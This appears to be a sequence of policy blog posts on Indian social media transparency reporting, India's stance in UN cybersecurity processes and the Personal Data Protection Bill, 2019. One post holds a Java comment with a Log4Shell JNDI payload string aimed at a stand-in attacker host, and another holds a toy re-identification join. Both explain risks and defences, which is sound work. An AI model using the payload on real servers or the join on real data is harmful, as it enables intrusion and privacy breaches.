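# Twitter:   ~34.6 complaints per million users
# Facebook:  ~1.5 complaints per million users
# ShareChat: ~35,507.6 complaints per million users
```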

Conclusion

Before concluding, it is relevant to note that no SSMI reporting discusses content that has been subjected to reduced visibility or algorithmically downranked. In the case of proactive moderation, Rule 4(1)(d) unfortunately limits itself to content that has been “removed”, although in the case of reactive moderation, reduced visibility would come within the ambit of ‘actions taken in response to complaints’ and should be reported on. Best practices would require platforms to disclose to users when and what content is subjected to reduced visibility. Rule 4(1)(d) did not form part of the draft intermediary guidelines that were subjected to public consultation in 2018, appearing for the first time in its current form in 2021. Broader consultation at the time of drafting may have eliminated such regulatory lacunae and resulted in a more robust framework for transparency reporting.

That said, getting meaningful transparency reporting is a hard task. Standardising reporting procedures is a detailed and fraught process that likely requires platforms and regulators to engage in a consultative process – see this document created by Daphne Keller listing out potential problems in reporting procedures. Sample problem: “If ten users notify platforms about the same piece of content, and the platform takes it down after reviewing the first notice, is that ten successful notices, or one successful notice and nine rejected ones?” Given the scale of the regulatory and technical challenges, it is perhaps unsurprising that the transparency reporting under the Intermediary Guidelines has gotten off to a rocky start. However, Rule 4(1)(d) itself offers an avenue for improvement. The Rule allows the MeitY to specify any additional information that platforms should publish in their transparency reports. In the case of proactive monitoring, requiring platforms to specify exactly how automated tools are deployed, and when content take downs based on these tools are reversed would be a good place to start. The MeitY must also engage with the functionality and internal procedures of SSMIs to ensure that reporting is harmonised to the extent possible. For example, reporting a “complaint” for Facebook and ShareChat should ideally have some equivalence. This requires, for a start, MeitY to consult with platforms, users, civil society, and academic experts when thinking about transparency.

Cyber Security at the UN: Where Does India Stand? (Part 2)

This is the second post of a two-part series which examines India’s participation in UN-affiliated processes and debates on ICTs and international security.

The first part offered an overview of how ideological divisions are shaping UN debates around the international framework for responsible state behaviour in the cyberspace. In this post, the author evaluates India’s stated positions on ICTs and international security at forums affiliated with the UN.

Author: Sidharth Deb

Introduction

As our digital transformation story has accelerated, Indian authorities have proactively worked on domestic laws, regulations and policies to govern digital and ICT domains. Prominent examples include its net neutrality regime; the 2021 intermediary guidelines and digital media ethics regulations; a soon to be enacted data protection law; and the National Cyber Security Policy, 2013, which is undergoing an overhaul. When it comes to institutional responses, India has, inter alia, operationalised a nodal Computer Emergency Response Team (“CERT-In”), sector specific CERTs, the National Critical Information Infrastructure Protection Centre (“NCIIPC”) to secure critical information infrastructures (“CIIs”), and the National Cyber Security Coordinator within the country’s National Security Council Secretariat.

Conversely, India’s participation in international cybersecurity processes like the United Nations’ Groups of Governmental Experts (“GGEs”) and the Open-Ended Working Groups (“OEWG”) remains less developed, and does not reflect its status as a ‘digital decider’ or swing State in cyber norms processes. Some describe its engagement as lacking cohesion, without substantive or long-term commitment to advancing an international agenda. They further characterise India’s position as one of silence, ambiguity and prioritisation of immediate national interest. India has even shied away from supporting multistakeholder-led norms packages on international cybersecurity such as the Paris Call for Trust and Security in Cyberspace. This perceived positional ambiguity is further reinforced by the fact that India supported both Russia’s proposal for the first OEWG and the US’ proposal for the sixth GGE. India has also endorsed Russia’s proposal for an ad-hoc committee for a cybercrime convention under the United Nations General Assembly’s Third Committee on Social, Humanitarian and Cultural Issues.

Indian Statements on International Security and ICTs

Given that India has an opportunity to assume an internationally significant role in international cybersecurity and norms related debates under processes like the 2nd OEWG, this post attempts to extract and infer meaning from India’s seemingly inconsistent and ambiguous positions. This involves an analysis of publicly available evidence of India’s participation in working groups and other forums within the UN. Subsequent takeaways reflect a composite examination of:

  1. India’s 2015 comments on UNGA Resolution 70/237, which endorsed the GGE-developed international framework for responsible state behaviour in cyberspace;
  2. India’s statement at the June 2019 organisational session of the first OEWG;
  3. India’s 2020 comments on the initial pre-draft of the OEWG’s report (these comments have since been taken down from the OEWG website);
  4. The Government of India’s February 2021 comments/remarks and proposed edits (January 2021) on the zero draft of the OEWG’s final substantive report; and
  5. India’s statement at the UNSC Open Debate on international cybersecurity (June 2021).

While the Indian delegation participated in the first substantive session of the 2nd OEWG in December 2021, its interventions are, as of writing, unavailable on the OEWG’s website. Based on an overview of the aforementioned statements, five key trends emerge.

First, the Indian Government appears to prefer state-led solutions to cybersecurity over multistakeholderism. While broadly highlighting the importance of multistakeholderism within internet governance, India’s 2015 submission at the UNGA argued that governments play the primary role in cybersecurity since it falls within the umbrella of ‘national security’. India has also made explicit recommendations at the OEWG negotiations to remove references to “human-centric” approaches and replace them with terms like “peace and stability”. Such statements convey a top-down outlook on ICT and cybersecurity policy. As its intervention at the UNSC makes clear, India prefers that stakeholders play a secondary role in cybersecurity policy: the Indian Foreign Secretary opined that stakeholders can play an important role in supporting international cooperation on cybersecurity.

Such positions are consistent with the Indian Government’s disposition that technology environments should adhere to the rule of law and policies framed by appropriate government authorities. Even so, domestically, the Indian government has demonstrated a willingness to participate in multistakeholder dialogue (at forums like India IGF) and seek stakeholder inputs on related policy matters.

Second, India aims to bring content, behaviour and speech over social media and the wider internet within the scope of international cyber security. When discussing the scope of cyber/information security, India has repeatedly referred to cyber terrorism, terrorist content, virulent propaganda, inciting speech, disinformation, terror financing and recruitment activities, and general misuse of social media. This is of course consistent with its domestic policy stance on stricter regulations for social media intermediaries under the 2021 intermediary guidelines and digital media ethics code. India has even called for international dialogue and cooperation to counter terror propaganda, remove content and real time support with investigations. It has called upon the international community to recognise cyber terrorism as a special class of cyber incident which requires stronger international cooperation. As discussed in Part 1 of this series, the OEWG may be receptive to broadening the scope of information security to include issues relating to online speech and social media. This is also evidenced by the fact that several States have raised similar issues during the first substantive session of the 2nd OEWG in December 2021.

Third, India appears to prefer an internationally binding rules-based framework on ICTs and cyberspace. This is evident from both India’s 2021 submission to the OEWG and its 2021 intervention at the UNSC’s open debate on cybersecurity. These submissions confirm that India appears open to a treaty/convention-based pathway to international cybersecurity. At the same time, during the 2021 OEWG negotiations, India categorically requested the deletion of a paragraph referring to a 2015 proposal for an international code of conduct for information security. The 2015 proposal was tabled by UN Member States who are also members of the Shanghai Cooperation Organisation (“SCO”). Notably, India joined the SCO a few months after the bloc tabled its 2015 proposal. The SCO’s proposal was largely steered under Russian and Chinese guidance.

Fourth, Indian interventions have laid heavy emphasis on the supply chain security of ICT products and services. India’s interventions focus on two key aspects. The first is an emphasis on cybersecurity resilience and hygiene among SMEs and children; the reference to SMEs can be read as an expression of India’s economic aspirations via digital transformation. The second is a call for greater international cooperation on matters surrounding trusted ICT products and services, and trusted suppliers of such products and services. This includes mitigating the introduction of harmful hidden functions, such as backdoors, within ICT products and services which can compromise essential networks. To this end, India has even called for the introduction of a new cyber norm on a standard for essential security in cyberspace. This position appears to align with recent mandatory testing and certification regulations for telecommunications equipment, and a more recent national security directive passed by Indian telecom authorities in response to growing concerns about Chinese presence in Indian telecom and ICT systems. Under this Directive, Indian telecom authorities have launched the ‘Trusted Telecom Portal’, which aims to ensure that Indian telecom networks only comprise equipment deemed to be ‘trusted products’ from ‘trusted sources’. Recent reports also reveal that the Indian Government is in the process of establishing a unified national cyber security task force, which will set up a specialised sub-department to focus on cyber threats in the telecom sector.

Lastly, on the applicability of international law to States’ use of ICTs—despite its participation in five out of six UN GGEs and the first OEWG—India has yet to substantively articulate an extensive position on this topic. Instead, it has made broader calls for non-binding, voluntary guidance from the international community on the application of key concepts within international humanitarian law like distinction, necessity, proportionality and humanity within the context of ICTs. India’s most animated interventions have pertained to jurisdiction and sovereignty. To be clear, it has not engaged on whether sovereignty is a principle or a rule of international law. Instead, it has called on the international community to reimagine sovereignty and jurisdiction—where a new technical basis (beyond territoriality) can allow States to effectively govern and secure cyberspace.

One such basis for sovereignty that India has put forth before the OEWG relates to data ownership and sovereignty. India suggests that such a philosophical underpinning would endorse people’s right to informational privacy online. Yet these positions also reflect, and seek to legitimise, wider trends in digital and ICT policymaking in India, including proposals to restrict cross-border data flows for various purposes, and India’s difficulties in carrying out law enforcement investigations owing to lethargic international cooperation via MLAT frameworks.

Conclusion

India’s current engagement with international cybersecurity issues serves as a mirror for India’s domestic political economy and immediate national interests. Given that it occupies a pivotal position as a digital swing state with the second largest internet user base in the world, India could have the geopolitical heft to steer the conversation away from ideological fault lines—and towards more substantive avenues.

However, in order to do this, it must adopt a more internationalised agenda while negotiating in these cyber norms processes. Since it is still early days when it comes to substantive discussions at the 2nd OEWG, and negotiations at other forthcoming processes are yet to commence, the time may be ripe for India to start formulating a more cohesive strategy in how it engages with international cyber norms processes.

To this end, Indian leadership could approach the forthcoming National Cyber Security Strategy as a jumping-off point from which to refine the Government's normative outlook on matters relating to international cybersecurity, international law and responsible state behaviour in cyberspace. The forthcoming strategy could also help the Government of India define how it collaborates with other States and non-governmental stakeholders. Finally, it could help identify domestic laws, policies and institutions that require reform to keep pace with international developments.

Cyber Security at the UN: Where Does India Stand? (Part 1)

Editorial Note: This is a two-part series examining India's participation in UN-affiliated processes and debates on ICTs and international security.

Part 1 provides an overview of the ideological divisions that are shaping UN debates around the international framework for responsible state behaviour in cyberspace. In Part 2, the author will critique India's stated positions on ICTs and international security at forums affiliated with the UN.

Author: Sidharth Deb

Introduction: The International Character of Cyber Threats 

Earlier this month, the United Nations General Assembly's ("UNGA") First Committee on Disarmament and International Security ("First Committee") convened Member States for the first substantive session of its second Open-Ended Working Group ("OEWG") on security of, and in the use of, information and communication technologies ("ICTs"). The 2nd OEWG is the latest working group under the aegis of the UNGA First Committee on themes relating to ICTs and international cybersecurity. Notably, in that same week, another major cyber vulnerability—the Apache Log4j flaw, in a widely used logging library—came to light, threatening computer systems globally. This vulnerability has been described as a major software supply chain flaw which can be used to remotely compromise hundreds of millions of vulnerable devices.
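To make the mechanics of the flaw concrete, the following is a minimal, illustrative Java sketch of the vulnerable pattern (the class, method and header names here are hypothetical, not drawn from any real incident). In affected Log4j 2.x releases, the library evaluated "${...}" lookups inside logged messages, so merely logging an attacker-controlled string could trigger a connection to an attacker's server:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical request handler illustrating the Log4Shell pattern.
public class LoginHandler {
    private static final Logger log = LogManager.getLogger(LoginHandler.class);

    // userAgent comes straight from an HTTP header, i.e. it is attacker-controlled.
    public void handle(String userAgent) {
        // In vulnerable Log4j 2.x releases (prior to the patched versions),
        // lookups were evaluated even inside message parameters. A header
        // value such as "${jndi:ldap://attacker.example/a}" would cause the
        // logger to perform a JNDI lookup to the attacker's server, which
        // could return a payload that the JVM then loads and executes.
        log.info("Login attempt from client: {}", userAgent);
    }
}
```

The widely recommended fix was to upgrade to a patched Log4j release; disabling message lookups (for example via the log4j2.formatMsgNoLookups property on versions that support it) circulated as an interim mitigation. This is precisely why the flaw is characterised as a supply chain problem: the vulnerable code sits in a dependency, not in the application logic itself.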

Experts are calling it a cyber pandemic, and exploits are already targeting corporate networks globally. More concerning is the fact that nation State-backed hackers have reportedly begun experimenting with and launching malicious operations to exploit the flaw. Along with recent incidents like WannaCry, NotPetya, SolarWinds, Colonial Pipeline and the Microsoft Exchange Server hack, such trends typify a rapidly evolving and increasingly scalable cyber threat landscape which emerges from heterogeneous sources. These include States which use ICT capabilities to advance military or political objectives, State-sponsored hacking groups, mercenary technology vendors (developing tools like spyware), and other criminal and/or terrorist non-State actors. To combat these trends, the international community must treat cyber diplomacy, international cooperation, assistance and a baseline harmonisation of jurisdictional efforts as essential prerequisites.

However, this is challenging since States often have diverging political, economic, developmental and military objectives. Therefore, in order to fulfil the core objective of a peaceful and stable cyberspace, international dialogue on ICT security must successfully navigate both peacetime and conflict paradigms. This includes working around the innate complexities posed by inter-State cyber conflict, such as the operationalisation of the law of armed conflict in cyberspace. Keeping these challenges in mind, this post presents an overview of ongoing cyber diplomacy efforts at the UN towards building an international legal and normative framework for responsible state behaviour in cyberspace. It then evaluates how ideological divisions between countries pose challenges to international consensus and multilateralism.

The UN, Cybersecurity and the Framework for Responsible State Behaviour 

Against the aforementioned backdrop, the second OEWG commences the next generation of deliberations on States' use of ICTs in the context of international peace and security. This Working Group was constituted in accordance with a UNGA resolution (75/240) dated December 31, 2020 and is set to run till 2025. It is open to participation from all 193 UN Member States, and the OEWG's Chair is in the midst of determining the extent and mechanisms of multistakeholder participation. Both this and the first iteration of the OEWG involve more inclusive participation of the international community as compared to the previous Groups of Governmental Experts ("GGEs") on ICT security, which had only 15 to 25 participating States.

Given the exponential innovation trajectories of ICT environments and the extended operational timelines, it will be a tall order for the 2nd OEWG to fulfil its mandate to identify existing and potential threats to information security. Yet, it is not starting from scratch. Concerted prior work at the GGEs and OEWG, along with subsequent consensus at the UNGA, has yielded an international framework for responsible state behaviour towards international cybersecurity. The framework comprises four distinct yet complementary pillars:

  1. International law, including the UN Charter and existing principles of international law, as it applies to States' use of ICTs. This was most recently elaborated in the May 2021 consensus report of the 6th GGE. 
  2. Politically determined cyber norms, which entail voluntary and non-binding norms, rules and principles of responsible State behaviour during peacetime. The norms include, inter alia, interstate cooperation such as the exchange of information and threat intelligence; attribution of ICT incidents; respecting human rights; protecting critical infrastructures; securing ICT supply chains; enabling ICT vulnerability disclosures; and preventing the misuse of ICTs for cybercrime and internationally wrongful acts. Cyber norms are meant to promote cooperation, increase predictability, reduce risks of misperception and escalation in cyberspace, and serve as a first step towards the eventual formation of customary international law in cyberspace. 
  3. The remaining two pillars are confidence building measures and capacity building. These aim to enhance interstate transparency and international and institutional (technical and policy) cooperation, systematise international assistance to implement the voluntary cyber norms framework, and create a baseline of competence and response capabilities across Member States.

Prima facie, these pillars reflect a comprehensive approach to tackling the wide-ranging threats in cyberspace. Yet they do not reflect the geopolitical divisions emerging between different country blocs. Since cybersecurity's prominence within the broader scheme of international peace and security continues to increase, it is important to track this aspect of international cyberspace cooperation.

Ideological Divisions in International Cybersecurity Processes 

Ideological divisions within international cybersecurity processes often fall along familiar geographic groupings. One side comprises the US, UK, Estonia and other NATO allies. On the other end of the spectrum is a Sino-Russian grouping, which also includes countries like Cuba and Iran. This section highlights four main ways in which these ideological divisions are shaping international cyber diplomacy.

  1. Goal of Dialogue: Legally Binding Agreement or Voluntary Politically-determined Norms-based Framework? 

Differences begin at the most fundamental levels of implementation. Consider the means of operationalising the international framework for state responsibility in the use of ICTs. Since the late 1990s, the Russian bloc has made multiple proposals for international work towards a binding treaty/convention on international cybersecurity and cybercrime. Such proposals advance Sino-Russian objectives of embedding core principles of internet sovereignty and state primacy within a rule-based framework of international ICT policy. Interests around sovereignty may also have motivated the Russian proposal to set up the first UN OEWG on ICT security, which opened up conversations on cybersecurity to all UN Member States. While the OEWG furthers openness, transparency and inclusivity in norm formulation, the push to expand participation is perhaps motivated by the ability to bring more countries with similar ideological positions into the discussions.

Among other things, their inclusion can create greater momentum to revisit, expand, or create new norms for State activities in cyberspace. The US and NATO bloc has strongly opposed the need for an international treaty-based framework, arguing that such an approach risks allowing States to negotiate away and dilute core principles like openness, interoperability, multistakeholderism and respect for human rights. At a secondary level, it could also lead to greater fetters on, and regulation of, transnational ICT/internet corporations—which tend to be concentrated in certain jurisdictions.

  2. Disputes on Applicability of International Law 

A prominent example here is the failure of negotiations at the 5th UN GGE in 2017. An important point of contention related to whether and how international law—especially international humanitarian law—applies in cyberspace. In broad terms, NATO allies advocated that the principles governing the use of force and self-defence—and, in situations of conflict, the principles of international humanitarian law—should apply in cyberspace. However, Cuba, serving as a front for the other bloc, opposed this, arguing that it would amount to a tacit endorsement of certain cyber operations and would incentivise escalation and militarisation of cyberspace. This was the straw that broke the camel's back, and it cost the international community consensus at the 5th GGE.

  3. Procedural Mechanisms and Modalities of Dialogue  

Since 2017, both the 1st OEWG and the 6th GGE have successfully adopted consensus reports, in March and May 2021 respectively. While these build on prior GGE consensus reports, especially the 2013 and 2015 reports, the aforementioned disputes demonstrate the fragility of consensus on international cybersecurity at the UN.

Even in the run-up to the 2nd OEWG's first substantive session (December 2021), States have disagreed on the modalities of engagement—for instance, whether the OEWG should hold broad conversations on all issues simultaneously among Member States, or whether the Chair should set up issue-specific thematic subgroups for different aspects of international cybersecurity.

  4. Definitional Scope of Key Concepts including “Information” Security 

Fundamental differences on key concepts—such as minimum identifiable standards of inter-State conduct, verification, evidence gathering, attribution and accountability among both State and non-State actors—threaten the international framework for peace and stability in cyberspace. A major point of contention which could emerge within the 2nd OEWG relates to its mandate of identifying existing and potential threats to information security. In contrast to the GGEs, the OEWG is increasing its focus on disinformation, defamation, incitement, propaganda, terrorist content, and other online speech/media. This can be discerned from the 1st OEWG's final substantive report, the Chair's Summary, and UNGA Resolution 75/240. The OEWG's eventual scope of “information security” will also reveal to what extent international policymakers aim to securitise different infrastructures and online public spaces within ICT environments. Given the implications this could have for principles like openness and interoperability, and for people's fundamental freedoms and human rights, dialogue on this front will be important to track.

Conclusion: The Importance of Digital Swing States 

Substantive fissures threaten multilateral international cooperation in cybersecurity. This risk manifested once before in the parallel operation of the 6th GGE and the 1st OEWG. Similar risks of fragmentation could emerge during the 2nd OEWG's tenure—there is already an ad hoc committee on a cybercrime convention which will commence substantive discussions under the UNGA's Third Committee in January 2022, and States including France and Egypt have made a proposal for an action-oriented Programme of Action to advance responsible state behaviour in cyberspace.

Given these risks, commentators observe that the role of swing states is integral if international cyber diplomacy is to steer the conversation towards more substantive pathways. One such swing State is India. The next post in this two-part series will explore India's engagement with UN-affiliated processes and debates on cybersecurity over time. Through this, we gain greater clarity on India's definitional approach to cybersecurity, and its views on multistakeholderism, supply chain security, and sovereignty in ICT environments.

Reflections on Personal Data Protection Bill, 2019

By Sangh Rakshita and Nidhi Singh


The Personal Data Protection Bill, 2019 (PDP Bill/Bill) was introduced in the Lok Sabha on December 11, 2019, and was immediately referred to a joint committee of Parliament. The joint committee published a press communique on February 4, 2020 inviting comments on the Bill from the public.

The Bill is the successor to the Draft Personal Data Protection Bill, 2018 (Draft Bill 2018), recommended by a government-appointed expert committee chaired by Justice B.N. Srikrishna. In August 2018, shortly after the committee's recommendations and the publication of the draft, the Ministry of Electronics and Information Technology (MeitY) invited comments on the Draft Bill 2018 from the public. (Our comments are available here.)[1]

In this post we undertake a preliminary examination of:

  • The scope and applicability of the PDP Bill
  • The application of general data protection principles
  • The rights afforded to data subjects
  • The exemptions provided to the application of the law

In future posts in the series, we will examine:

  • The restrictions on cross border transfer of personal data
  • The structure and functions of the regulatory authority
  • The enforcement mechanism and the penalties under the PDP Bill

Scope and Applicability

The Bill identifies four different categories of data: personal data, sensitive personal data, critical personal data and non-personal data.

Personal data is defined as “data about or relating to a natural person who is directly or indirectly identifiable, having regard to any characteristic, trait, attribute or any other feature of the identity of such natural person, whether online or offline, or any combination of such features with any other information, and shall include any inference drawn from such data for the purpose of profiling.” (emphasis added)

The addition of inferred data within the definition of personal data is an interesting reflection of the way the conversation around data protection has evolved in the past few months, and requires further analysis.

Sensitive personal data is defined as data that may reveal, be related to or constitute a number of different categories of personal data, including financial data, health data, official identifiers, sex life, sexual orientation, genetic data, transgender status, intersex status, caste or tribe, and religious and political affiliations / beliefs. In addition, under clause 15 of the Bill the Central Government can notify other categories of personal data as sensitive personal data in consultation with the Data Protection Authority and the relevant sectoral regulator.

Similar to the 2018 Bill, the current Bill does not define critical personal data; clause 33 gives the Central Government the power to notify what is included under critical personal data. However, in its report accompanying the 2018 Bill, the Srikrishna committee had referred to some examples of critical personal data relating to critical state interests, such as Aadhaar numbers, genetic data, biometric data and health data.

The Bill retains the terminology introduced in the 2018 Draft Bill, referring to data controllers as ‘data fiduciaries’ and data subjects as ‘data principals’. The new terminology was introduced to reflect the fiduciary nature of the relationship between data controllers and subjects. However, whether this specific terminology has any greater impact on the protection and enforcement of data subjects’ rights remains to be seen.

 Application of PDP Bill 2019

The Bill is applicable to (i) the processing of any personal data, which has been collected, disclosed, shared or otherwise processed in India; (ii) the processing of personal data by the Indian government, any Indian company, citizen, or person/ body of persons incorporated or created under Indian law; and (iii) the processing of personal data in relation to any individuals in India, by any persons outside of India.

The scope of the 2019 Bill is largely similar in this context to that of the 2018 Draft Bill. However, one key difference is seen in relation to anonymised data. While the 2018 Draft Bill completely exempted anonymised data from its scope, the 2019 Bill does so only partially: under clause 91, the government retains the power to mandate the use and processing of non-personal data or anonymised personal data under policies to promote the digital economy. A few concerns arise from this change in the treatment of anonymised personal data. First, there are concerns about the concept of anonymisation of personal data itself. While the Bill provides that the Data Protection Authority (DPA) will specify appropriate standards of irreversibility for the process of anonymisation, it is not clear that a truly irreversible form of anonymisation is possible at all. Given this, more clarity is needed on what safeguards will apply to the use of anonymised personal data.
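To illustrate why irreversibility is so hard to guarantee, consider the well-documented ‘linkage attack’, in which a notionally anonymised dataset is joined with a public dataset on shared quasi-identifiers. The following is a minimal, illustrative Java sketch using entirely invented toy data (the record fields and values are hypothetical, not drawn from the Bill or any real dataset):

```java
import java.util.List;

// Toy linkage attack: records stripped of names can still be re-identified
// by joining on quasi-identifiers (here: PIN code, date of birth and sex)
// that also appear in a public dataset such as a voter roll.
public class LinkageAttack {
    record Anonymised(String pin, String dob, String sex, String diagnosis) {}
    record PublicRecord(String name, String pin, String dob, String sex) {}

    public static void main(String[] args) {
        List<Anonymised> health = List.of(
                new Anonymised("110001", "1985-03-12", "F", "diabetes"));
        List<PublicRecord> voterRoll = List.of(
                new PublicRecord("A. Sharma", "110001", "1985-03-12", "F"));

        // Join the two datasets on the shared quasi-identifiers.
        for (Anonymised h : health)
            for (PublicRecord p : voterRoll)
                if (h.pin().equals(p.pin()) && h.dob().equals(p.dob())
                        && h.sex().equals(p.sex()))
                    System.out.println(p.name() + " -> " + h.diagnosis());
    }
}
```

If the combination of quasi-identifiers is unique (as it often is in small localities), the ‘anonymised’ record resolves to a named individual. This is why standards of irreversibility cannot be assessed in isolation from the other datasets an adversary may hold.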

Second, is the Bill’s focus on the promotion of the digital economy. We have previously discussed some of the concerns regarding focus on the promotion of digital economy in a rights based legislation in our comments to the Draft Bill 2018.

These issues continue to be of concern, and are perhaps heightened by the introduction of a specific provision on the subject in the 2019 Bill (especially without adequate clarity on what services or policy-making efforts in this direction are to be informed by the use of anonymised personal data). Many of these issues are also still under discussion by the committee of experts set up to deliberate on a data governance framework for non-personal data. The mandate of this committee includes studying various issues relating to non-personal data and making specific suggestions, for the central government’s consideration, on the regulation of non-personal data.

The formation of the non-personal data committee was in pursuance of a recommendation by the Justice Srikrishna Committee to create a legal framework for the protection of community data, where the community is identifiable. The mandate of the expert committee will overlap with the application of clause 91(2) of the Bill.

Data Fiduciaries, Social Media Intermediaries and Consent Managers

Data Fiduciaries

As discussed above, the Bill categorises data controllers as data fiduciaries and significant data fiduciaries. Any person that determines the purpose and means of processing of personal data (including the State, companies, juristic entities or individuals) is considered a data fiduciary. Some data fiduciaries may be notified as ‘significant data fiduciaries’, on the basis of factors such as the volume and sensitivity of personal data processed, the risk of harm, etc. Significant data fiduciaries are held to higher standards of data protection. Under clauses 27-30, they are required to carry out data protection impact assessments, maintain accurate records, have their policies and the conduct of their processing of personal data audited, and appoint a data protection officer. 

Social Media Intermediaries

The Bill introduces a distinct category of intermediaries called social media intermediaries. Under clause 26(4) a social media intermediary is ‘an intermediary who primarily or solely enables online interaction between two or more users and allows them to create, upload, share, disseminate, modify or access information using its services’. Intermediaries that primarily enable commercial or business-oriented transactions, provide access to the Internet, or provide storage services are not to be considered social media intermediaries.

Social media intermediaries may be notified as significant data fiduciaries if they have a minimum number of users, and their actions have, or are likely to have, a significant impact on electoral democracy, the security of the State, public order, or the sovereignty and integrity of India.

Under clause 28, social media intermediaries that have been notified as significant data fiduciaries will be required to provide for voluntary verification of users, to be accompanied by a demonstrable and visible mark of verification.

Consent Managers

The Bill also introduces the idea of a ‘consent manager’, i.e., a (third-party) data fiduciary which provides for the management of consent through an ‘accessible, transparent and interoperable platform’. The Bill does not contain any details on how consent management will be operationalised, stating only that these details will be specified by regulations under the Bill. 

Data Protection Principles and Obligations of Data Fiduciaries

Consent and grounds for processing

The Bill recognises consent as well as a number of other grounds for the processing of personal data.

Clause 11 provides that personal data shall only be processed if consent is provided by the data principal at the commencement of processing. This provision, similar to the consent provision in the 2018 Draft Bill, draws from various principles including those under the Indian Contract Act, 1872 to inform the concept of valid consent under the PDP Bill. The clause requires that the consent should be free, informed, specific, clear and capable of being withdrawn.

Moreover, explicit consent is required for the processing of sensitive personal data. The current Bill appears to be silent on issues such as incremental consent which were highlighted in our comments in the context of the Draft Bill 2018.

The Bill provides for additional grounds for processing of personal data, consisting of very broad (and much criticised) provisions for the State to collect personal data without obtaining consent. In addition, personal data may be processed without consent if required in the context of employment of an individual, as well as a number of other ‘reasonable purposes’. Some of the reasonable purposes, which were listed in the Draft Bill 2018 as well, have also been a cause for concern given that they appear to serve mostly commercial purposes, without regard for the potential impact on the privacy of the data principal.

In a notable change from the Draft Bill 2018, the PDP Bill appears to be silent on whether these other grounds for processing will be applicable to sensitive personal data (with the exception of processing in the context of employment, which is explicitly barred).

Other principles

The Bill also incorporates a number of traditional data protection principles in the chapter outlining the obligations of data fiduciaries. Personal data can only be processed for a specific, clear and lawful purpose. Processing must be undertaken in a fair and reasonable manner and must ensure the privacy of the data principal – a clear mandatory requirement, as opposed to a ‘duty’ owed by the data fiduciary to the data principal in the Draft Bill 2018 (this change appears to be in line with recommendations made in multiple comments to the Draft Bill 2018 by various academics, including our own).

Purpose and collection limitation principles are mandated, along with a detailed description of the kind of notice to be provided to the data principal, either at the time of collection, or as soon as possible if the data is obtained from a third party. The data fiduciary is also required to ensure that data quality is maintained.

A few changes in the application of data protection principles, as compared to the Draft Bill 2018, can be seen in the data retention and accountability provisions.

On data retention, clause 9 of the Bill provides that personal data shall not be retained beyond the period ‘necessary’ for the purpose of data processing, and must be deleted after such processing, ostensibly a higher standard as compared to ‘reasonably necessary’ in the Draft Bill 2018. Personal data may only be retained for a longer period if explicit consent of the data principal is obtained, or if retention is required to comply with law. In the face of the many difficulties in ensuring meaningful consent in today’s digital world, this may not be a win for the data principal.

Clause 10 on accountability continues to provide that the data fiduciary will be responsible for compliance in relation to any processing undertaken by the data fiduciary or on its behalf. However, the data fiduciary is no longer required to demonstrate such compliance.

Rights of Data Principals

Chapter V of the PDP Bill 2019 outlines the Rights of Data Principals, including the rights to access, confirmation, correction, erasure, data portability and the right to be forgotten. 

Right to Access and Confirmation

The PDP Bill 2019 makes some amendments to the right to confirmation and access, contained in clause 17 of the Bill. The right has been expanded in scope by the inclusion of sub-clause (3). Clause 17(3) requires data fiduciaries to provide data principals with information about the identities of any other data fiduciaries with whom their personal data has been shared, along with details about the kind of data that has been shared.

This allows the data principal to exert greater control over their personal data and its use. The rights to confirmation and access are important rights that inform and enable a data principal to exercise other rights under the data protection law. As recognised in the Srikrishna Committee Report, these are ‘gateway rights’, which must be given a broad scope.

Right to Erasure

The right to correction (Clause 18) has been expanded to include the right to erasure. This allows data principals to request erasure of personal data which is not necessary for processing. While data fiduciaries may be allowed to refuse correction or erasure, they would be required to produce a justification in writing for doing so, and if there is a continued dispute, indicate alongside the personal data that such data is disputed.

The addition of a right to erasure is an expansion of rights from the 2018 Bill. While the right to be forgotten only restricts or discontinues disclosure of personal data, the right to erasure goes a step further and empowers the data principal to demand complete removal of their data from the systems of the data fiduciary.

Many of the concerns expressed in the context of the Draft Bill 2018, in terms of the procedural conditions for the exercise of the rights of data principals, as well as the right to data portability specifically, continue to persist in the PDP Bill 2019.

Exceptions and Exemptions

While the PDP Bill ostensibly enables individuals to exercise their right to privacy against the State and the private sector, it contains numerous exemptions, which raise serious concerns.

The Bill grants broad exceptions to the State. In some cases, the exemption applies to specific obligations, such as the requirement for individuals’ consent. In other cases, State action is almost entirely exempted from obligations under the law. Some of these exemptions from data protection obligations are available to the private sector as well, on grounds like journalistic purposes, research purposes and the interests of innovation.

The most concerning of these provisions are the exemptions granted to intelligence and law enforcement agencies under the Bill. The Draft Bill 2018 also provided exemptions to intelligence and law enforcement agencies, but only insofar as the privacy-invasive actions of these agencies were permitted under law, met procedural standards, and satisfied the legal standards of necessity and proportionality. We have previously discussed some of the concerns with this approach here.

The exemptions provided to these agencies under the PDP Bill seem to exacerbate these issues.

Under the Bill, the Central Government can exempt an agency of the government from the application of the Act by passing an order, with reasons recorded in writing, if it is of the opinion that the exemption is necessary or expedient in the interest of the sovereignty and integrity of India, the security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence relating to the aforementioned grounds. Not only have the grounds on which government agencies can be exempted been worded in an expansive manner, but the procedure for granting these exemptions is also bereft of any safeguards.

Executive functioning in India at times suffers from problems of opacity and unfettered discretion, which calls for a robust system of checks and balances to avoid abuse. The Indian Telegraph Act, 1885 (Telegraph Act) and the Information Technology Act, 2000 (IT Act) enable government surveillance of communications made over telephones and the internet. For comparison, we primarily refer to the Telegraph Act, as it allows the government to intercept phone calls, by an order in writing, on grounds similar to those mentioned in clause 35 of the Bill. However, the Telegraph Act limits the use of this power to two scenarios – the occurrence of a public emergency or the interest of public safety. The government cannot intercept communications made over telephones in the absence of these two preconditions.

The Supreme Court in People’s Union for Civil Liberties v. Union of India (1997) introduced guidelines to check abuse of surveillance powers under the Telegraph Act, which were later incorporated in Rule 419A of the Indian Telegraph Rules, 1951. A prominent safeguard included in Rule 419A requires that surveillance and monitoring orders be issued only after considering ‘other reasonable means’ for acquiring the required information. The court further limited the interpretation of ‘public emergency’ and ‘public safety’ to mean “the prevalence of a sudden condition or state of affairs affecting the people at large and calling for immediate action”, and “the state or condition of freedom from danger or risk at large” respectively.

In spite of these safeguards, the procedure for intercepting telephone communications under the Telegraph Act has been criticised for lack of transparency and improper implementation. For instance, a 2014 report revealed that around 7,500–9,000 phone interception orders were issued by the Central Government every month – roughly 250 to 300 orders every day. Applying the procedural safeguards in each case would be physically impossible given the sheer numbers. Thus, legislative and judicial oversight becomes a necessity in such cases.

